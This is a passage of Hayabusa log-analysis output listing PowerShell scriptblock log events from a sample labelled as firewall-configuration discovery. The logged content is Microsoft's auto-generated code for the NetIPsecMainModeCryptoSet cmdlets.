$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 